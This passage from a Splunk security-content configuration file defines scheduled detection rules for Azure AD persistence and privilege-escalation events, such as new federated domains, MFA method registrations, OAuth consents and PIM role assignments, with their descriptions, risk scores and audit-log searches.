A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = In most organizations, new custom domains will be updated infrequently. Filter as needed.
action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD New Custom Domain Added - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = A new custom domain, $domain$ , was added by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD New Custom Domain Added - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the addition of a new custom domain within an Azure Active Directory tenant. Adding a custom domain is a step required to set up the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. 
If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.notable.param.rule_title = Azure AD New Custom Domain Added action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Add unverified domain" properties.result=success | rename properties.* as * | rename targetResources{}.displayName as domain | stats count min(_time) as firstTime max(_time) as lastTime by user, domain, result, operationName, src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_new_custom_domain_added_filter` [ESCU - Azure AD New Federated Domain Added - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the addition of a new federated domain within an Azure Active Directory tenant. This event could represent the execution of the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. 
If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the addition of a new federated domain within an Azure Active Directory tenant. This event could represent the execution of the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. 
This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = In most organizations, domain federation settings will be updated infrequently. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD New Federated Domain Added - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = A new federated domain, $domain$ , was added by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD New Federated Domain Added - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the addition of a new federated domain within an Azure Active Directory tenant. This event could represent the execution of the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. 
A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.notable.param.rule_title = Azure AD New Federated Domain Added action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Set domain authentication" "properties.result"=success | rename properties.* as * | rename targetResources{}.displayName as domain | stats count min(_time) as firstTime max(_time) as lastTime by user, domain, result, operationName, src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_new_federated_domain_added_filter` [ESCU - Azure AD New MFA Method Registered - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects the registration of a new Multi-Factor Authentication (MFA) method associated with a user account within Azure Active Directory by monitoring Azure AD audit logs and configurations. While adding a new MFA method can be a routine and legitimate action, it can also be indicative of an attacker's attempt to maintain persistence on a compromised account. 
By registering a new MFA method, attackers can potentially bypass existing security measures, allowing them to authenticate using stolen credentials without raising alarms. Monitoring for such changes is crucial, especially if the addition is not preceded by a user request or if it deviates from typical user behavior. If an attacker successfully registers a new MFA method on a compromised account, they can solidify their access, making it harder for legitimate users to regain control. The attacker can then operate with the privileges of the compromised account, potentially accessing sensitive data, making unauthorized changes, or even escalating their privileges further. Immediate action would be required to verify the legitimacy of the MFA change and, if malicious, to remediate and secure the affected account. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This analytic detects the registration of a new Multi-Factor Authentication (MFA) method associated with a user account within Azure Active Directory by monitoring Azure AD audit logs and configurations. While adding a new MFA method can be a routine and legitimate action, it can also be indicative of an attacker's attempt to maintain persistence on a compromised account. By registering a new MFA method, attackers can potentially bypass existing security measures, allowing them to authenticate using stolen credentials without raising alarms. Monitoring for such changes is crucial, especially if the addition is not preceded by a user request or if it deviates from typical user behavior. If an attacker successfully registers a new MFA method on a compromised account, they can solidify their access, making it harder for legitimate users to regain control. 
The attacker can then operate with the privileges of the compromised account, potentially accessing sensitive data, making unauthorized changes, or even escalating their privileges further. Immediate action would be required to verify the legitimacy of the MFA change and, if malicious, to remediate and secure the affected account. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. action.escu.known_false_positives = Users may register MFA methods legitimately; investigate and filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD New MFA Method Registered - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = A new MFA method was registered for user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD New MFA Method Registered - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098",
"T1098.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects the registration of a new Multi-Factor Authentication (MFA) method associated with a user account within Azure Active Directory by monitoring Azure AD audit logs and configurations. While adding a new MFA method can be a routine and legitimate action, it can also be indicative of an attacker's attempt to maintain persistence on a compromised account. By registering a new MFA method, attackers can potentially bypass existing security measures, allowing them to authenticate using stolen credentials without raising alarms. Monitoring for such changes is crucial, especially if the addition is not preceded by a user request or if it deviates from typical user behavior. If an attacker successfully registers a new MFA method on a compromised account, they can solidify their access, making it harder for legitimate users to regain control. The attacker can then operate with the privileges of the compromised account, potentially accessing sensitive data, making unauthorized changes, or even escalating their privileges further. Immediate action would be required to verify the legitimacy of the MFA change and, if malicious, to remediate and secure the affected account. 
action.notable.param.rule_title = Azure AD New MFA Method Registered action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Update user" | rename properties.* as * | eval propertyName = mvindex('targetResources{}.modifiedProperties{}.displayName', 0) | search propertyName = StrongAuthenticationMethod | eval oldvalue = mvindex('targetResources{}.modifiedProperties{}.oldValue',0) | eval newvalue = mvindex('targetResources{}.modifiedProperties{}.newValue',0) | rex field=newvalue max_match=0 "(?i)(?<new_method_type>\"MethodType\")" | rex field=oldvalue max_match=0 "(?i)(?<old_method_type>\"MethodType\")" | eval count_new_method_type = coalesce(mvcount(new_method_type), 0) | eval count_old_method_type = coalesce(mvcount(old_method_type), 0) | stats earliest(_time) as firstTime latest(_time) as lastTime values(propertyName) by user newvalue oldvalue | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_new_mfa_method_registered_filter` [ESCU - Azure AD New MFA Method Registered For User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the registration of a new Multi Factor authentication method for an Azure AD account. Adversaries who have obtained unauthorized access to an Azure AD account may register a new MFA method to maintain persistence. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556", "T1556.006"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the registration of a new Multi Factor authentication method for an Azure AD account.
Adversaries who have obtained unauthorized access to an Azure AD account may register a new MFA method to maintain persistence. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = Newly onboarded users who are registering an MFA method for the first time will also trigger this detection. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD New MFA Method Registered For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Compromised User Account", "Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = A new MFA method was registered for user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD New MFA Method Registered For User - Rule action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account", "Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556", "T1556.006"], "nist": 
["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the registration of a new Multi Factor authentication method for an Azure AD account. Adversaries who have obtained unauthorized access to an Azure AD account may register a new MFA method to maintain persistence. action.notable.param.rule_title = Azure AD New MFA Method Registered For User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=AuditLogs operationName="User registered security info" properties.operationType=Add | rename properties.* as * | rename targetResources{}.* as * | stats count min(_time) as firstTime max(_time) as lastTime by user, resultDescription, result, src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_new_mfa_method_registered_for_user_filter` [ESCU - Azure AD OAuth Application Consent Granted By User - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects when a user in an Azure AD environment grants consent to an OAuth application, capturing any consent granted regardless of the specific permissions requested. Utilizing Azure AD audit logs, it focuses on events related to OAuth application consents, alerting security teams to instances where users actively grant consent to applications. This monitoring is crucial as it highlights potential risks associated with third-party applications gaining access to organizational data, a tactic often exploited by malicious actors to gain unauthorized access. 
A true positive from this analytic necessitates immediate investigation to validate the application's legitimacy, review the granted permissions, and assess potential risks, helping to prevent unauthorized access and protect sensitive data and resources. While false positives may occur with legitimate application integrations, ensuring alignment with organizational policies and security best practices is paramount. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects when a user in an Azure AD environment grants consent to an OAuth application, capturing any consent granted regardless of the specific permissions requested. Utilizing Azure AD audit logs, it focuses on events related to OAuth application consents, alerting security teams to instances where users actively grant consent to applications. This monitoring is crucial as it highlights potential risks associated with third-party applications gaining access to organizational data, a tactic often exploited by malicious actors to gain unauthorized access. A true positive from this analytic necessitates immediate investigation to validate the application's legitimacy, review the granted permissions, and assess potential risks, helping to prevent unauthorized access and protect sensitive data and resources. While false positives may occur with legitimate application integrations, ensuring alignment with organizational policies and security best practices is paramount. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. 
action.escu.known_false_positives = False positives may occur if users are granting consents as part of legitimate application integrations or setups. It is crucial to review the application and the permissions it requests to ensure they align with organizational policies and security best practices.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD OAuth Application Consent Granted By User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $user$ consented to an OAuth application.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD OAuth Application Consent Granted By User - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects when a user in an Azure AD environment grants consent to an OAuth application, capturing any consent granted regardless of the specific permissions requested. Utilizing Azure AD audit logs, it focuses on events related to OAuth application consents, alerting security teams to instances where users actively grant consent to applications. This monitoring is crucial as it highlights potential risks associated with third-party applications gaining access to organizational data, a tactic often exploited by malicious actors to gain unauthorized access. A true positive from this analytic necessitates immediate investigation to validate the application's legitimacy, review the granted permissions, and assess potential risks, helping to prevent unauthorized access and protect sensitive data and resources. While false positives may occur with legitimate application integrations, ensuring alignment with organizational policies and security best practices is paramount.
action.notable.param.rule_title = Azure AD OAuth Application Consent Granted By User
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` operationName="Consent to application" properties.result=success | rename properties.* as * | eval permissions_index = if(mvfind('targetResources{}.modifiedProperties{}.displayName', "ConsentAction.Permissions") >= 0, mvfind('targetResources{}.modifiedProperties{}.displayName', "ConsentAction.Permissions"), -1) | eval permissions = mvindex('targetResources{}.modifiedProperties{}.newValue',permissions_index) | rex field=permissions "Scope: (?<Scope>[^,]+)" | stats count min(_time) as firstTime max(_time) as lastTime by operationName, user, Scope | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_oauth_application_consent_granted_by_user_filter`

[ESCU - Azure AD PIM Role Assigned - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the assignment of the Azure AD PIM role. Privileged Identity Management (PIM) is a service within Azure AD that enables administrators to manage, control, and monitor access to sensitive resources. PIM provides time-based and approval-based role activation to mitigate the risks of excessive, unnecessary, or misused access permissions on resources. Once a user has been made eligible for an administrative role, she must activate this role assignment to perform the privileged actions. When a role is activated, Azure AD PIM temporarily adds an active assignment for the role. While PIM can be leveraged as a powerful security control, it may also be abused by adversaries to obtain privileged access. Security teams should monitor for the assignment and activation of PIM roles and validate their legitimacy.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies the assignment of the Azure AD PIM role. Privileged Identity Management (PIM) is a service within Azure AD that enables administrators to manage, control, and monitor access to sensitive resources. PIM provides time-based and approval-based role activation to mitigate the risks of excessive, unnecessary, or misused access permissions on resources. Once a user has been made eligible for an administrative role, she must activate this role assignment to perform the privileged actions. When a role is activated, Azure AD PIM temporarily adds an active assignment for the role. While PIM can be leveraged as a powerful security control, it may also be abused by adversaries to obtain privileged access. Security teams should monitor for the assignment and activation of PIM roles and validate their legitimacy.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category.
action.escu.known_false_positives = As part of legitimate administrative behavior, users may be assigned PIM roles. Filter as needed.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD PIM Role Assigned - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Privilege Escalation", "Azure Active Directory Persistence"]
action.risk = 1
action.risk.param._risk_message = An Azure AD PIM role assignment was assigned to $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD PIM Role Assigned - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Privilege Escalation", "Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the assignment of the Azure AD PIM role. Privileged Identity Management (PIM) is a service within Azure AD that enables administrators to manage, control, and monitor access to sensitive resources. PIM provides time-based and approval-based role activation to mitigate the risks of excessive, unnecessary, or misused access permissions on resources. Once a user has been made eligible for an administrative role, she must activate this role assignment to perform the privileged actions. When a role is activated, Azure AD PIM temporarily adds an active assignment for the role. While PIM can be leveraged as a powerful security control, it may also be abused by adversaries to obtain privileged access. Security teams should monitor for the assignment and activation of PIM roles and validate their legitimacy.
action.notable.param.rule_title = Azure AD PIM Role Assigned
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` operationName="Add eligible member to role in PIM completed*" | rename properties.* as * | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user values(targetResources{}.displayName) as displayName by result, operationName, initiatedBy.user.displayName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_pim_role_assigned_filter`

[ESCU - Azure AD PIM Role Assignment Activated - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the assignment of the Azure AD PIM role. Privileged Identity Management (PIM) is a service within Azure AD that enables administrators to manage, control, and monitor access to sensitive resources. PIM provides time-based and approval-based role activation to mitigate the risks of excessive, unnecessary, or misused access permissions on resources. Once a user has been made eligible for an administrative role, she must activate this role assignment to perform the privileged actions. When a role is activated, Azure AD PIM temporarily adds an active assignment for the role. While PIM can be leveraged as a powerful security control, it may also be abused by adversaries to obtain privileged access. Security teams should monitor for the assignment and activation of PIM roles and validate their legitimacy.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies the assignment of the Azure AD PIM role. Privileged Identity Management (PIM) is a service within Azure AD that enables administrators to manage, control, and monitor access to sensitive resources. PIM provides time-based and approval-based role activation to mitigate the risks of excessive, unnecessary, or misused access permissions on resources. Once a user has been made eligible for an administrative role, she must activate this role assignment to perform the privileged actions. When a role is activated, Azure AD PIM temporarily adds an active assignment for the role. While PIM can be leveraged as a powerful security control, it may also be abused by adversaries to obtain privileged access. Security teams should monitor for the assignment and activation of PIM roles and validate their legitimacy.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category.
action.escu.known_false_positives = As part of legitimate administrative behavior, users may activate PIM roles. Filter as needed.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD PIM Role Assignment Activated - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Privilege Escalation", "Azure Active Directory Persistence"]
action.risk = 1
action.risk.param._risk_message = An Azure AD PIM role assignment was activated by $initiatedBy$ for $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD PIM Role Assignment Activated - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Privilege Escalation", "Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the assignment of the Azure AD PIM role. Privileged Identity Management (PIM) is a service within Azure AD that enables administrators to manage, control, and monitor access to sensitive resources. PIM provides time-based and approval-based role activation to mitigate the risks of excessive, unnecessary, or misused access permissions on resources. Once a user has been made eligible for an administrative role, she must activate this role assignment to perform the privileged actions. When a role is activated, Azure AD PIM temporarily adds an active assignment for the role. While PIM can be leveraged as a powerful security control, it may also be abused by adversaries to obtain privileged access. Security teams should monitor for the assignment and activation of PIM roles and validate their legitimacy.
action.notable.param.rule_title = Azure AD PIM Role Assignment Activated
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` operationName="Add member to role completed (PIM activation)" | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user values(targetResources{}.displayName) as displayName by initiatedBy, result, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_pim_role_assignment_activated_filter`

[ESCU - Azure AD Privileged Authentication Administrator Role Assigned - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the assignment of the Privileged Authentication Administrator role to an Azure AD user. Users in this role can set or reset authentication methods for any user in Azure Active Directory, including privileged roles like Global Administrators. Users with this role can change credentials for people who may have access to sensitive or private information or critical configuration inside and outside of Azure Active Directory. Changing the credentials of a user may mean the ability to assume that user's identity and permissions. Red teams and adversaries alike may abuse this role to escalate their privileges.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002"], "nist": ["DE.CM"]}
action.escu.data_models = ["Authentication"]
action.escu.eli5 = The following analytic identifies the assignment of the Privileged Authentication Administrator role to an Azure AD user. Users in this role can set or reset authentication methods for any user in Azure Active Directory, including privileged roles like Global Administrators. Users with this role can change credentials for people who may have access to sensitive or private information or critical configuration inside and outside of Azure Active Directory. Changing the credentials of a user may mean the ability to assume that user's identity and permissions. Red teams and adversaries alike may abuse this role to escalate their privileges.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category.
action.escu.known_false_positives = Administrators may legitimately assign the Privileged Authentication Administrator role as part of administrative tasks. Filter as needed.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Privileged Authentication Administrator Role Assigned - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Privilege Escalation"]
action.risk = 1
action.risk.param._risk_message = The privileged Azure AD role Privileged Authentication Administrator was assigned for User $user$ initiated by $initiatedBy$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 50}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 50}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
